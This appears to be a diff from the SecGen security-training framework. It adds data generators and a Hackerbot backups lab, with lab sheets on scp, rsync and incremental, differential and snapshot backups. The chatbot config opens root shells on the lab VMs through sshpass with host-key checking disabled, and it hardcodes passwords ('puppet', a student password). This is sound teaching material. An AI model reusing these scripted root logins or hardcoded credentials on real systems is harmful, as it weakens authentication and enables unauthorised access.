nino = "QQ"<<(10..99).to_a.sample(3)*''<<("A".."D").to_a.sample
self.outputs << nino
end
end
NINGenerator.new.run

View File

@@ -0,0 +1,20 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>National Insurance Number</name>
<author>Z. Cliffe Schreuders</author>
<module_license>MIT</module_license>
<description>Generates a UK NIN (National Insurance Number).</description>
<type>national_insurance_number_generator</type>
<type>sensitive_personal</type>
<type>local_calculation</type>
<platform>linux</platform>
<platform>windows</platform>
<reference>https://codereview.stackexchange.com/questions/9464/national-insurance-number-generator</reference>
<output_type>sensitive_personal</output_type>
</generator>

View File

@@ -0,0 +1,20 @@
#!/usr/bin/ruby
require_relative '../../../../../lib/objects/local_string_encoder.rb'
require 'faker'
class WebsiteThemeSelector < StringEncoder
def initialize
super
self.module_name = 'Website Theme Selector'
end
# Selects one of the parameterised_website css themes and returns it
def encode_all
filenames = Dir.entries("#{ROOT_DIR}/modules/services/unix/http/parameterised_website/files/themes/").reject {|f| File.directory?(f) || f[0].include?('.')}
self.outputs << filenames.sample
end
end
WebsiteThemeSelector.new.run

View File

@@ -0,0 +1,17 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Website Theme Generator</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>Theme selector for parameterised_website module.</description>
<type>website_theme</type>
<platform>linux</platform>
<platform>windows</platform>
<output_type>string</output_type>
</generator>

View File

@@ -18,8 +18,11 @@ Our IT team has started developing the servers that we will be deploying; althou
Our network design is to have a web server connected to an Internet-accessible IP address (DMZ), while all other servers and end user desktops will be connected to an intranet, with any connections out to the Internet via NAT.
Our systems include:
* A web server with network services
* An intranet server, hosting our security policy documents for internal access
* Desktop systems
The Web host will eventually be processing credit card transactions; hopefully thousands of transactions every month.

View File

@@ -2,13 +2,29 @@
require_relative '../../../../../lib/objects/local_string_generator.rb'
class WordGenerator < StringGenerator
attr_accessor :wordlist
def initialize
super
self.wordlist = []
self.module_name = 'Random Word Generator'
end
def get_options_array
super + [['--wordlist', GetoptLong::OPTIONAL_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--wordlist'
self.wordlist << arg;
end
end
def generate
# Pick a random wordlist from those provided (--wordlist), then a random word from it
word = File.readlines("#{WORDLISTS_DIR}/#{self.wordlist.sample.chomp}").sample.chomp
self.outputs << word.gsub(/[^\w]/, '')
end
end

View File

@@ -17,6 +17,11 @@
<reference>https://github.com/sophsec/wordlist</reference>
<reference>http://wordlist.sourceforge.net/</reference>
<read_fact>wordlist</read_fact>
<default_input into="wordlist">
<value>wordlist</value>
</default_input>
<output_type>generated_strings</output_type>
</generator>

View File

@@ -0,0 +1,35 @@
#!/usr/bin/ruby
require_relative '../../../../../../lib/objects/local_hackerbot_config_generator.rb'
class Backup < HackerbotConfigGenerator
attr_accessor :server_ip
def initialize
super
self.module_name = 'Hackerbot Config Generator Backups'
self.title = 'Backups'
self.local_dir = File.expand_path('../../',__FILE__)
self.templates_path = "#{self.local_dir}/templates/"
self.config_template_path = "#{self.local_dir}/templates/lab.xml.erb"
self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb"
self.server_ip = []
end
def get_options_array
super + [['--server_ip', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--server_ip'
self.server_ip << arg;
end
end
end
Backup.new.run

View File

@@ -0,0 +1,49 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Hackerbot config for a backups lab</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Generates a config file for a hackerbot for a backups lab.
Topics covered: backing up and recovering data using SSH/SCP and rsync (full, differential, incremental, and snapshot backups).</description>
<type>hackerbot_config</type>
<platform>linux</platform>
<read_fact>accounts</read_fact>
<read_fact>flags</read_fact>
<read_fact>root_password</read_fact>
<read_fact>server_ip</read_fact>
<!--TODO: require input, such as accounts, or fail?-->
<default_input into="accounts">
<generator type="account">
<input into="username">
<value>vagrant</value>
</input>
</generator>
</default_input>
<default_input into="flags">
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
</default_input>
<default_input into="root_password">
<value>puppet</value>
</default_input>
<output_type>hackerbot</output_type>
</generator>

View File

@@ -0,0 +1,29 @@
<html>
<head>
<title><%= self.title %></title>
</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
}
}
</style>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js"></script>
</body>
</html>

View File

@@ -0,0 +1,4 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.

View File

@@ -0,0 +1,338 @@
# Backing Up and Recovering from Disaster: SSH/SCP, Deltas, and Rsync
## Getting started
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot_server (leave it running, you don't log into this)
- backup_server (IP address: <%= $server_ip %>)
- desktop
All of these VMs need to be running to complete the lab.
### Your login details for the "desktop" and "backup_server" VMs
User: <%= $main_user %>
Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)
You won't login to the hackerbot_server, but the VM needs to be running to complete the lab.
You don't need to login to the backup_server, but you will connect to it via SSH later in the lab.
### For marks in the module
1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different to others' in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Follow the link on the module page to submit your flags.
2. **You need to document the work and your solutions in a workbook**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Workbook Questions". The workbook will be submitted later in the semester.
## Meet Hackerbot!
![small-right](images/skullandusb.svg)
This exercise involves interacting with Hackerbot, a chatbot who will attack your system. If you satisfy Hackerbot by completing the challenges, she will reveal flags to you.
**On the desktop VM:**
==Open Pidgin and send "hello" to Hackerbot:==
Work through the below exercises, completing the Hackerbot challenges as noted.
---
## Availability and recovery
As you will recall, availability is a common security goal. This includes data availability, and systems and services availability. Preparing for when things go wrong, and having procedures in place to respond and recover is a task known as contingency planning. This includes business continuity planning (BCP), which has a wide scope covering many kinds of problems, disaster recovery planning, which aims to recover ICT after a major disaster, and incident response (IR) planning, which aims to detect and respond to security incidents.
Business impact analysis involves determining which business processes are mission critical, and what the recovery requirements are. This includes Recovery Point Objectives (RPO), that is, which data and services are acceptable to lose and how often backups are necessary, and Recovery Time Objectives (RTO), which is how long it should take to recover, and the amount of downtime that is allowed for.
Having reliable backups and redundancy that can be used to recover data and/or services is a basic security maintenance requirement.
## Uptime
At a console, ==run:==
```bash
uptime
```
`15:32:38 up 4 days, 23:50, 4 users, load average: 1.01, 1.24, 1.17`
A common goal is to aim for "five nines" availability (99.999%). If you only have one server, that means keeping it running constantly, other than for scheduled maintenance.
==In your log book, list a few legitimate security reasons for performing off-line maintenance.==
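The arithmetic behind "five nines" is worth doing once: 99.999% availability leaves only 0.001% of the year for downtime. A quick one-liner (any system with awk) works out the budget:

```bash
# Downtime budget implied by "five nines" (99.999%) over one year
awk 'BEGIN {
  year_minutes = 365.25 * 24 * 60
  allowed = year_minutes * (1 - 0.99999)
  printf "five nines allows %.2f minutes of downtime per year\n", allowed
}'
# prints: five nines allows 5.26 minutes of downtime per year
```

In other words, a single unplanned reboot can consume most of a year's allowance.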
## Copy
The simplest of the Unix copy commands is `cp`. `cp` takes a local source and destination, and can recursively copy contents from one file or directory to another.
Make a directory to store your backups. ==Run:==
```bash
mkdir /home/<%= $main_user %>/backups/
```
==Make a backup copy of your /etc/passwd file:==
```bash
cp /etc/passwd /home/<%= $main_user %>/backups/
```
We have made a backup of a source file (/etc/passwd), to our destination directory (/home/<%= $main_user %>/backups/). Note that we lost the metadata associated with the file, including file ownership and permissions:
```bash
ls -la /home/<%= $main_user %>/backups/passwd
ls -la /etc/passwd
```
Note (and take the time to understand) the differences in the output from these two commands.
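To see this metadata loss in isolation, here is a minimal sketch using scratch files (the filenames are made up for the demo): plain `cp` resets the modification time, while `cp -p` preserves mode, ownership, and timestamps.

```bash
# Demo: plain cp resets the modification time; cp -p preserves it
cd "$(mktemp -d)"
touch -d '2001-02-03 04:05:06' source_file   # give the file an old timestamp
cp source_file plain_copy                    # mtime becomes "now"
cp -p source_file preserved_copy             # mtime stays 2001-02-03
stat -c '%n  %y' source_file plain_copy preserved_copy
```

Compare the timestamps in the `stat` output: only the `-p` copy matches the source.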
## SSH (secure shell) and SCP (secure copy)
Using SSH (secure shell), scp (secure copy) can transfer files securely (encrypted) over a network.
> This replaces the old insecure rcp command, which sends files over the network in-the-clear (not encrypted). Rcp should never be used.
==Backup your /etc/ directory to the backup_server== computer using scp:
```bash
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh_backup/
```
> This may take some time; feel free to open another terminal console (Ctrl-T) to read the scp man page while you wait
Read the scp man page to ==determine what the -p and -r flags do==.
> Hint: "man scp", press "q" to quit.
Now, let's add a file to /etc, and repeat the backup:
```bash
sudo bash -c 'echo > /etc/hi'
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh_backup/
```
Note that the program re-copies all of the files entirely, regardless of whether (or how much) they have changed.
==SSH to your backup_server system==, to look at your backup files:
> ssh ***username***@***server-ip-address***
This will log you in with *username* on the remote system. Assuming the remote computer has the same user account available (as is the case with the VMs provided), you can omit "username", and just run "ssh *ip-address*", and you will be prompted to provide authentication for your own account, as configured on that system.
So, that is:
```bash
ssh <%= $server_ip %>
```
> Enter your password when prompted
List the files that have been backed up:
```bash
ls -la ssh_backup/
```
**Exit ssh**:
> exit
>
> (Or Ctrl-D)
>
> Note, this command will close your bash shell, if you are not logged in via ssh.
## Rsync, deltas and epoch backups
Rsync is a popular tool for copying files locally, or over a network. Rsync can use delta encoding (only sending *differences* over the network rather than whole files) to reduce the amount of data that needs to be transferred. Many commercial backup systems provide a managed frontend for rsync.
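Before using rsync for real backups, you can watch the delta algorithm at work with a small local sketch (scratch directories only; `--no-whole-file` forces delta transfer, which rsync normally skips for local copies, and `--stats` reports how much literal data was actually sent):

```bash
# Sketch: observe rsync's delta encoding on a local copy
src=$(mktemp -d); dst=$(mktemp -d)
head -c 1000000 /dev/urandom > "$src/big"     # ~1 MB test file
rsync -a "$src/" "$dst/"                      # first copy: everything is sent
echo "small append" >> "$src/big"             # change the file slightly
# Only a small fraction of the file is re-sent as "Literal data"
rsync -a --no-whole-file --stats "$src/" "$dst/" | grep -i 'literal data'
```

The "Literal data" figure after the small change is far below the 1 MB file size: rsync matched the unchanged blocks and sent only the difference.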
Note: make sure you exited ssh above, and are now running commands on your local system.
Let's start by doing a simple ==copy of your /etc/ directory== to a local destination:
```bash
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
> Note that the presence of a trailing "/" changes the behaviour, so be careful when constructing rsync commands. In this case we are copying the directory (not just its contents), into the directory rsync\_backup. See the man page for more information.
Rsync reports the amount of data "sent".
Read the rsync man page, to ==understand the flags we have used== (-a and -v). As you will see, rsync has a great many options.
Now, let's ==add a file to /etc, and repeat the backup:==
```bash
sudo bash -c 'echo hello > /etc/hello'
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
Note that only the new file was transferred (incremental) to update our epoch (full) backup of /etc/.
## Rsync remote copies via SSH with compression
Rsync can act as a server, listening on a TCP port. It can also be used via SSH, as you will see. ==Copy your /etc/ directory to your backup_server== system using Rsync via SSH:
```bash
sudo rsync -avzh /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
> Tip: this is all one line
Note that this initial copy will have used less network traffic compared to scp, due to the -z flag, which tells rsync to use compression. Compare the amount of data sent (as reported by rsync in the previous command -- the -h told rsync to use human-readable sizes) to the size of the directory that was backed up:
```bash
sudo du -sh /etc
```
Now, if you were to ==delete a local file== that had been backed up:
```bash
sudo rm /etc/hello
```
Even if you ==re-sync your local changes== to the backup_server, the file will not be deleted from the server:
```bash
sudo rsync -avzh /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
To recover the file, you can simply ==retrieve the backup:==
```bash
sudo rsync -avz <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/etc/hello /etc/
```
> Note, however, that the recovered file is no longer owned by root. This can be avoided if you have SSH root access to the remote machine (for security reasons this is not usually enabled), which allows ownership and so on to be retained. Alternatively, you can use an Rsync server running as root.
==Delete the file locally, and sync the changes== *including deletions* to the server so that it is also deleted there:
```bash
sudo rm /etc/hello
sudo rsync -avz --delete /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
> Note the added "**-\-delete**"
==Confirm that the file has been deleted== from the backup stored on the server.
> Hint: login via SSH and view the backups
==Compare the file access/modification times== of the scp and rsync backups: are they the same or similar? If not, why? Note that rsync can retain this information, if run as root.
## Rsync incremental/differential backups
If you need to keep daily backups, it would be an inefficient use of disk space (and network traffic) to simply save separate full copies of your entire backup each day. Therefore, it often makes sense to copy only the files that have changed for each daily backup. The comparison can be made either against the last backup of any kind (incremental) or against the last full backup (differential).
### Differential backups
==Create a full backup== of /etc/ to your local /tmp/ directory.
==Create a new file== in /etc:
```bash
sudo bash -c 'echo "hello there" > /etc/hello'
```
And now let's ==create a differential backup== of our changes to /etc:
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ /tmp/etc_backup2/
```
> The **-\-compare-dest** flag tells rsync to search these backup copies, and only copy files if they have changed since a backup. Refer to the man page for further explanation.
Look at what is contained in /tmp/etc\_backup2/:
```bash
tree /tmp/etc_backup2
ls -la /tmp/etc_backup2/
```
Note that there are lots of empty directories, with only the files that have actually changed (in this case /etc/hello).
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "hello there!" > /etc/hi'
```
To ==make a differential backup== (saving changes since the last full backup), we just repeat the previous command, with a new destination directory:
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ /tmp/etc_backup3/
```
Look at the contents of your new backup. You will find it now contains your two new files. That is, all of the changes since the full backup.
==Delete a non-essential existing file== in /etc/, and our test hello file:
```bash
sudo rm /etc/wgetrc /etc/hello
```
Now ==restore from your backups== by first restoring from the full backup, then the latest differential backup. The advantage of a differential backup is that you only need two commands to restore your system.
### Incremental backups
The disadvantage of the above differential approach to backups is that your daily backup gets bigger and bigger every day until you do another full backup. With incremental backups you only store the changes since the last backup.
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test1'
```
Now ==create an incremental backup== based on the last differential backup:
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ --compare-dest=/tmp/etc_backup3/ /tmp/etc_backup_incremental1/
```
==Another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test2'
```
Now ==create an incremental backup based on the last differential backup and the last incremental backup:==
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ --compare-dest=/tmp/etc_backup3/ --compare-dest=/tmp/etc_backup_incremental1/ /tmp/etc_backup_incremental2/
```
If we were to ==delete a number of files:==
```bash
sudo rm /etc/wgetrc /etc/hello /etc/test1 /etc/test2
```
Now ==restore /etc== by restoring from the full backup, then the last differential backup, then the first incremental backup, then the second incremental backup.
### Rsync snapshot backups
Another approach to keeping backups is to keep a snapshot of all of the files, but wherever the files have not changed, a hard link is used to point at a previously backed up copy. If you are unfamiliar with hard links, read more about them online. This approach gives users a snapshot of how the system was on a particular date, without having to have redundant full copies of files.
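If hard links are new to you, this short scratch-directory sketch shows the key property: both names refer to the same inode, so no extra file data is stored, and the data survives until the last link is removed.

```bash
# Quick hard-link demo (scratch directory; filenames are illustrative)
cd "$(mktemp -d)"
echo "same data" > original
ln original snapshot_copy          # hard link: a second name for the same inode
ls -li original snapshot_copy      # identical inode numbers, link count 2
rm original
cat snapshot_copy                  # prints: same data
```

This is exactly how rsync snapshots stay cheap: unchanged files in each snapshot are hard links back to earlier copies.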
These snapshots can be achieved using the --link-dest flag. Open the Rsync man page, and read about --link-dest. Let's see it in action.
==Make another copy of our local /etc backup:==
```bash
sudo rsync -avh --delete /etc /tmp/etc_snapshot_full
```
And ==make a snapshot== containing hard links to files that have not changed, with copies for files that have changed:
```bash
sudo rsync -avh --delete --link-dest=/tmp/etc_snapshot_full /etc /tmp/etc_snapshot1
```
Rsync reports not having copied any new files, yet look at what is contained in /tmp/etc\_snapshot1: it appears to be a complete copy, while taking up almost no extra storage space.
==Create other changes== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test3'
sudo bash -c 'echo "Another test change" > /etc/test4'
```
And ==make a new snapshot==, with copies of files that have changed:
```bash
sudo rsync -avh --delete --link-dest=/tmp/etc_snapshot_full /etc /tmp/etc_snapshot2
```
==Delete some files==, and ==make a new snapshot==. Although Rsync does not report a deletion, the deleted files will be absent from the new snapshot.
==Recover a file from a previous snapshot.==
## Resources
[http://webgnuru.com/linux/rsync\_incremental.php](http://webgnuru.com/linux/rsync_incremental.php)
[http://everythinglinux.org/rsync/](http://everythinglinux.org/rsync/)

View File

@@ -0,0 +1,86 @@
## Uptime
At a console, ==run:==
```bash
uptime
```
`15:32:38 up 4 days, 23:50, 4 users, load average: 1.01, 1.24, 1.17`
A common goal is to aim for "five nines" availability (99.999%). If you only have one server, that means keeping it running constantly, other than for scheduled maintenance.
==In your log book, list a few legitimate security reasons for performing off-line maintenance.==
## Copy
The simplest of Unix copy commands, is `cp`. `cp` takes a local source and destination, and can recursively copy contents from one file or directory to another.
Make a directory to store your backups. ==Run:==
```bash
mkdir /home/<%= $main_user %>/backups/
```
==Make a backup copy of your /etc/passwd file:==
```bash
cp /etc/passwd /home/<%= $main_user %>/backups/
```
We have made a backup of a source file (/etc/passwd), to our destination directory (/home/<%= $main_user %>/backups/). Note that we lost the metadata associated with the file, including file ownership and permissions:
```bash
ls -la /home/<%= $main_user %>/backups/passwd
ls -la /etc/passwd
```
Note and take the time to ==understand the differences in the output== from these two commands. Notably the backup file is now owned by <%= $main_user %> (and also belongs to that user's primary group).
## SSH (secure shell) and SCP (secure copy)
Using SSH (secure shell), `scp` (secure copy) can transfer files securely (encrypted) over a network.
> This replaces the old insecure rcp command, which sends files over the network in-the-clear (not encrypted). Rcp should never be used.
==Backup your /etc/ directory to the backup_server== computer using `scp`:
```bash
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh_backup/
```
> You will be prompted for your local password, to confirm the host's fingerprint ("yes"), and for the remote password (which is the same).
> This copy may take some time; feel free to open another terminal console (Ctrl-T) to read the scp man page while you wait.
Read the scp man page to ==determine what the `-p` and `-r` flags do==.
> Hint: "`man scp`", press "q" to quit.
Now, let's add a file to /etc, and repeat the backup:
```bash
sudo bash -c 'echo > /etc/hi'
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh_backup/
```
Note that the program re-copies all of the files entirely, regardless of whether (or how much) they have changed.
==SSH to your backup_server system==, to look at your backup files:
> `ssh *username*@*server-ip-address*` will log you in with *username* on the system. Assuming the remote computer has the same user account available (as is the case with the VMs provided), you can omit "username", and just run "`ssh *ip-address*`", and you will be prompted to provide authentication for your own account, as configured on that system.
So, that is:
```bash
ssh <%= $server_ip %>
```
> Enter your password when prompted
List the files that have been backed up:
```bash
ls -la ssh_backup/
```
**Exit ssh**:
> `exit`
>
> (Or Ctrl-D)
>
> Note, this command will close your bash shell, if you are not logged in via ssh.

View File

@@ -0,0 +1,44 @@
# Backing Up and Recovering from Disaster: SSH/SCP, Deltas, and Rsync
## Getting started
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot_server (leave it running, you don't log into this)
- backup_server (IP address: <%= $server_ip %>)
- desktop
All of these VMs need to be running to complete the lab.
### Your login details for the "desktop" and "backup_server" VMs
User: <%= $main_user %>
Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)
You won't login to the hackerbot_server, but the VM needs to be running to complete the lab.
You don't need to login to the backup_server, but you will connect to it via SSH later in the lab.
### For marks in the module
1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different to others' in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Follow the link on the module page to submit your flags.
2. **You need to document the work and your solutions in a workbook**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Workbook Questions". The workbook will be submitted later in the semester.
## Hackerbot!
![small-right](images/skullandusb.svg)
This exercise involves interacting with Hackerbot, a chatbot who will task you to perform backups and will attack your system. If you satisfy Hackerbot by completing the challenges, she will reveal flags to you.
**On the desktop VM:**
==Open Pidgin and send "hello" to Hackerbot:==
Work through the below exercises, completing the Hackerbot challenges as noted.
---
## Availability and recovery
As you will recall, availability is a common security goal. This includes data availability, and systems and services availability. Preparing for when things go wrong, and having procedures in place to respond and recover is a task known as contingency planning. This includes business continuity planning (BCP), which has a wide scope covering many kinds of problems, disaster recovery planning, which aims to recover ICT after a major disaster, and incident response (IR) planning, which aims to detect and respond to security incidents.
Business impact analysis involves determining which business processes are mission critical, and what the recovery requirements are. This includes Recovery Point Objectives (RPO), that is, which data and services are acceptable to lose and how often backups are necessary, and Recovery Time Objectives (RTO), which is how long it should take to recover, and the amount of downtime that is allowed for.
Having reliable backups and redundancy that can be used to recover data and/or services is a basic security maintenance requirement.

View File

@@ -0,0 +1,440 @@
<%
require 'json'
require 'securerandom'
require 'digest/sha1'
require 'fileutils'
require 'erb'
if self.accounts.length < 2
abort('Sorry, you need to provide at least two accounts (the second supplies the files to back up)')
end
$first_account = JSON.parse(self.accounts.first)
$second_account = JSON.parse(self.accounts[1])
$files = []
$log_files = []
if $second_account.key?("leaked_filenames") && $second_account['leaked_filenames'].size > 0
$files = $second_account['leaked_filenames']
$log_files = $second_account['leaked_filenames'].grep(/log/)
end
if $files.empty?
$files = ['myfile', 'afile', 'filee', 'thefile']
end
if $log_files.empty?
$log_files = ['log', 'thelog', 'logs', 'frogonalog']
end
$main_user = $first_account['username'].to_s
$second_user = $second_account['username'].to_s
$example_file = "/home/#{$second_user}/#{$files.sample}"
$example_dir = "/home/#{$second_user}/personal_secrets/"
$server_ip = self.server_ip.first
$root_password = self.root_password
$flags = self.flags
REQUIRED_FLAGS = 10
if $flags.length < REQUIRED_FLAGS
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
# Pad with random flags so the template can still render
$flags << "flag{#{SecureRandom.hex}}" while $flags.length < REQUIRED_FLAGS
end
def get_binding
binding
end
%>
<?xml version="1.0"?>
<hackerbot
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/hackerbot">
<!--<hackerbot xmlns="http://www.github/cliffe/SecGen/hackerbotz"-->
<name>Hackerbot</name>
<AIML_chatbot_rules>config/AIML</AIML_chatbot_rules>
<!--Method for gaining shell access, can be overwritten per-attack-->
<!--<get_shell>bash</get_shell>-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash</get_shell>
<messages>
<greeting>Hey, today I'm your boss of sorts... Work with me and I'll pay you in flags :) These tasks do require the steps to be completed in order.</greeting>
<!--Must provide alternatives for each message-->
<say_ready>When you are ready, simply say 'ready'.</say_ready>
<say_ready>'Ready'?</say_ready>
<next>Ok, I'll do what I can to move things along...</next>
<next>Moving things along to the next one...</next>
<previous>Ok, I'll do what I can to back things up...</previous>
<previous>Ok, backing up.</previous>
<goto>Ok, skipping it along.</goto>
<goto>Let me see what I can do to goto that job.</goto>
<last_attack>That was the last one for now. You can rest easy, until next time... (End.)</last_attack>
<last_attack>That was the last one. Game over?</last_attack>
<first_attack>You are back to the beginning!</first_attack>
<first_attack>This is where it all began.</first_attack>
<getting_shell>Ok. Gaining shell access, and running post command...</getting_shell>
<getting_shell>Here we go...</getting_shell>
<got_shell>I am in to your system.</got_shell>
<got_shell>I have shell.</got_shell>
<repeat>Let me know when you are 'ready', if you want to move on say 'next', or 'previous' and I'll move things along.</repeat>
<repeat>Say 'ready', 'next', or 'previous'.</repeat>
<!--Single responses:-->
<help>I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*'</help>
<say_answer>Say "The answer is *X*".</say_answer>
<no_quiz>There is no question to answer</no_quiz>
<correct_answer>Correct</correct_answer>
<incorrect_answer>Incorrect</incorrect_answer>
<invalid>That's not possible.</invalid>
<non_answer>Wouldn't you like to know.</non_answer>
<!--can be overwritten per-attack-->
<shell_fail_message>Oh no. Failed to get shell... You need to let us in.</shell_fail_message>
</messages>
<tutorial_info>
<title>Backing Up and Recovering from Disaster: SSH/SCP, Deltas, and Rsync</title>
<tutorial><%= ERB.new(File.read self.templates_path + 'intro.md.erb').result(self.get_binding) %></tutorial>
<footer>
<%= File.read self.templates_path + 'resources.md.erb' %>
<%= File.read self.templates_path + 'license.md.erb' %>
Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= Time.new.to_s %>)
</footer>
<provide_tutorial>true</provide_tutorial>
</tutorial_info>
<attack>
<% $file = SecureRandom.hex(2) -%>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<prompt>Use scp to copy the desktop /bin/ directory to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-bin-backup-<%= $file %>/, which should then include the backed up bin/ directory.</prompt>
<post_command>ls /home/<%= $main_user %>/remote-bin-backup-<%= $file %>/bin/ls /home/<%= $main_user %>/remote-bin-backup-<%= $file %>/bin/mkdir > /dev/null; echo $?</post_command>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( You didn't copy to the remote /home/<%= $main_user %>/remote-bin-backup-<%= $file %>/bin/... Remember that the trailing / changes whether you are copying directories or their contents...</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %></message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something was not right...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'cp_ssh.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync-->
<prompt>It's your job to set up remote backups for <%= $second_user %> (a user on your system). Use rsync to create a full (epoch) remote backup of /home/<%= $second_user %> from your desktop system to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>.</prompt>
<post_command>ls /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/<%= $files.sample %> > /dev/null; echo $?</post_command>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %></message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( You didn't copy to the remote /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/ Remember that the trailing / changes whether you are copying directories or their contents...</message>
</condition>
<else_condition>
<message>:( Doesn't look like you have backed up all of <%= $second_user %>'s files to /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>. Try SSHing to the server and look at what you have backed up there.</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'rsync.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<% $first_notes = SecureRandom.hex(2) -%>
<% $hidden_flag = $flags.pop -%>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>The <%= $second_user %> user is about to create some files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Note to self: drink more water <%= $first_notes %>" > /home/<%= $second_user %>/notes; echo "Beep boop beep" > /home/<%= $second_user %>/logs/log2; echo <%= $hidden_flag %> > /home/<%= $second_user %>/personal_secrets/flag; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... (Hint: Keep an eye out for a flag...)</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<!--TODO: needs testing: fixed $files.sample?-->
<attack>
<!--shell on the backup server-->
